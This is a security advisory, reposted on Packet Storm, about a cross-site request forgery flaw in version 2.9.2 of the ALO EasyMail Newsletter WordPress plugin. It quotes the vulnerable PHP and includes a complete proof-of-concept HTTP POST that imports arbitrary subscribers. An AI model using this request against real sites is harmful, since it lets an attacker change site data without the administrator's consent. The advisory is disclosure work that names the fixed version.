exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress ALO EasyMail Newsletter 2.9.2 Cross Site Request Forgery

WordPress ALO EasyMail Newsletter 2.9.2 Cross Site Request Forgery
Posted Aug 1, 2016
Authored by Yorick Koster, Securify B.V.

WordPress ALO EasyMail Newsletter plugin version 2.9.2 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | ae00196b511cb748d0d23fe742e953b03adfd2422a853721694ecebb3ed4dd8a

WordPress ALO EasyMail Newsletter 2.9.2 Cross Site Request Forgery

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0021

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the ALO EasyMail Newsletter WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to add/import arbitrary subscribers. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on ALO EasyMail Newsletter WordPress
Plugin version 2.9.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in ALO EasyMail Newsletter version 2.9.3.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_alo_easymail_newsletter_wordpress_plugin.html

A number of actions within ALO EasyMail Newsletter consist of two steps. The 'step one' action is protected against Cross-Site Request Forgery by means of the check_admin_referer() WordPress function.

<?php
/**
* Bulk action: Step #1/2
*/
if ( isset($_REQUEST['doaction_step1']) ) {
check_admin_referer('alo-easymail_subscribers');
However the call to check_admin_referer() has been commented out for all 'step two' actions. Due to this it is possible for an attacker to perform a Cross-Site Request Forgery attack for all the 'step 2' actions.

/**
* Bulk action: Step #2/2
*/
if ( isset($_REQUEST['doaction_step2']) ) {
//if($wp_version >= '2.6.5') check_admin_referer('alo-easymail_subscribers');


Amongst others, this issue can be used to add/import arbitrary subscribers. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Proof of concept
POST /wp-admin/edit.php?post_type=newsletter&page=alo-easymail%2Fpages%2Falo-easymail-admin-subscribers.php&doaction_step2=true&action=import HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: <session cookies>
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------17016644981835490787491067954
Content-Length: 645

-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="uploaded_csv"; filename="foo.csv"
Content-Type: text/plain

sumofpwn@securify.n;Summer of Pwnage;en

-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="post_type"

newsletter
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="action"

import_step2
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="doaction_step2"

Upload CSV file
-----------------------------17016644981835490787491067954--


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close